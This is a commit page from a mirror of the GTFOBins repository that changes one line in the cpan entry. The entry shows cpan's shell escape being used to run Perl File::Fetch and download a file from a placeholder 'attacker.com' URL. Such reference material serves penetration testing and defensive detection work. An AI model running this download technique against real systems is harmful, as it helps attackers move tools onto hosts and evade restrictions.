mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Polish cpan
This commit is contained in:
parent
754e5e0f95
commit
27c1c56577
@ -23,7 +23,7 @@ functions:
|
|||||||
file-download:
|
file-download:
|
||||||
- description: Fetch a remote file via HTTP GET request and store it in PWD.
|
- description: Fetch a remote file via HTTP GET request and store it in PWD.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/evil.txt
|
export URL=http://attacker.com/file_to_get
|
||||||
cpan
|
cpan
|
||||||
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
|
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user